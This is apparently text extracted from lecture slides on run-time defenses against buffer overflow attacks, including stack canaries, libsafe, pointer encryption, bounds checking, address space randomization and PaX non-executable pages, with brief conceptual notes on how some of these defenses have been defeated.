Run-Time Checking: “Canaries” on the stack Embed “canaries” in stack frames and verify their integrity prior to function return Any overflow of local variables will damage the canary Choose random canary string on program start Attacker can’t guess what the value of canary will be Terminator canary: “\0”, newline, linefeed, EOF String functions like strcpy won’t copy beyond “\0” canary buf sfp ret addr Frame of the calling function Top of stack Local variables Pointer to previous frame Return execution to this address

Canary Implementation Requires code recompilation Checking canary integrity prior to every function return causes a performance penalty For example, 8% for Apache Web server This defense can be defeated! Phrack article by Bulba and Kil3r

Protecting more than just return addresses Rearrange stack layout to prevent pointer overflow args No arrays or pointers String growth return address SFP CANARY Cannot overwrite any pointers by overflowing an array arrays Stack growth local variables Ptrs, but no arrays

Run-Time Checking: Safe libraries Dynamically loaded library Intercepts calls to strcpy(dest,src) Checks if there is sufficient space in current stack frame |frame-pointer – dest| > strlen(src) If yes, does strcpy; else terminates application top of stack sfp ret-addr dest src buf sfp ret-addr libsafe main

Purify Instruments all memory accesses Works on relocatable object code Links to modified malloc() that supports tracking tables Inserts special instructions before each load and store instruction Detects all runtime memory errors and memory leaks Violation of array bounds, use of uninitialized variables Mainly a debugging tool Severe performance penalty (3-5 times slowdown)

Encrypting pointers in memory Attack: overflow a function pointer so that it points to attack code Idea: encrypt all pointers while in memory Generate a random key when program is executed Each pointer is XORed with this key when loaded from memory to registers or stored back into memory Pointers cannot be overflown while in registers Attacker cannot predict the target program’s key Even if pointer is overwritten, after XORing with key it will dereference to a “random” memory address

Normal Pointer Dereference CPU 1. Fetch pointer value 2. Access data referenced by pointer Memory Pointer 0x1234 Data 0x1234 0x1234 0x1340 CPU Memory Corrupted pointer Data 1. Fetch pointer value 2. Access attack code referenced by corrupted pointer Attack code

Dereference with encrypted pointers CPU 0x1234 1. Fetch pointer value 2. Access data referenced by pointer Decrypt Memory Encrypted pointer 0x7239 Data 0x1234 0x1234 0x1340 CPU Memory Corrupted pointer 0x7239 Data 2. Access random address; segmentation fault and crash Attack code 1. Fetch pointer value 0x9786 Decrypt Decrypts to random value

Issues with encrypted pointers Must be very fast Pointer dereferences are very common Compiler issues Must encrypt and decrypt only pointers If compiler “spills” registers, unencrypted pointer values end up in memory and can be overwritten there Attacker should not be able to modify the key Store key in its own non-writable memory page PG’d code doesn’t mix well with normal code What if PG’d code needs to pass a pointer to OS kernel?

Dynamic Analysis Check for buffer overflows at runtime Advantage: actual size of memory objects available There are many techniques, but most require modified pointer representation To better keep track of where each pointer is pointing Jones and Kelly (1997): referent objects Referent object = buffer to which the pointer points Result of pointer arithmetic must point to same object Idea: keep track of beginning and size of each object to determine whether a given pointer is “in bounds” Does not require modification of pointer representation

Jones-Kelly Approach Pad each object by 1 byte C permits a pointer to point to the byte right after an allocated memory object Maintain a runtime table of allocated objects Replace all out-of-bounds addresses with special ILLEGAL value at runtime Program crashes if pointer to ILLEGAL dereferenced

Introducing Artificial Code Diversity Buffer overflow and return-to-libc exploits need to know the (virtual) address to which pass control Address of attack code in the buffer Address of a standard kernel library routine Same address is used on many machines Slammer infected 75,000 MS-SQL servers using same code on every machine Idea: introduce artificial diversity Make stack addresses, addresses of library routines, etc. unpredictable and different from machine to machine

Address Space Randomization Randomly choose base address of stack, heap, code segment Randomly pad stack frames and malloc() calls Randomize location of Global Offset Table Randomization can be done at compile- or link-time, or by rewriting existing binaries Threat: attack repeatedly probes randomized binary Several implementations available

PaX Linux kernel patch Goal: prevent execution of arbitrary code in an existing process’s memory space Enable executable/non-executable memory pages Any section not marked as executable in ELF binary is non-executable by default Stack, heap, anonymous memory regions Access control in mmap(), mprotect() prevents changes to protection state during execution Randomize address space

Non-Executable Pages in PaX In x86, pages cannot be directly marked as non-executable PaX marks each page as “non-present” or “supervisor level access” This raises a page fault on every access Page fault handler determines if the page fault occurred on a data access or instruction fetch Instruction fetch: log and terminate process Data access: unprotect temporarily and continue

Base-Address Randomization Note that only base address is randomized Layouts of stack and library table remain the same Relative distances between memory objects are not changed by base address randomization To attack, it’s enough to guess the base shift A 16-bit value can be guessed by brute force Try 215 (on average) different overflows with different values for the address of a known library function Was broken in 2004 by a team from Stanford.

Ideas for Better Randomization 64-bit addresses At least 40 bits available for randomization Memory pages are usually between 4K and 4M in size Brute-force attack on 40 bits is not feasible

Ideas for Better Randomization Randomly re-order entry points of library functions Finding address of one function is no longer enough to compute addresses of other functions What if attacker finds address of system()? … at compile-time No virtual mem constraints (can use more randomness) What are the disadvantages?? … or at run-time How are library functions shared among processes? How does normal code find library functions?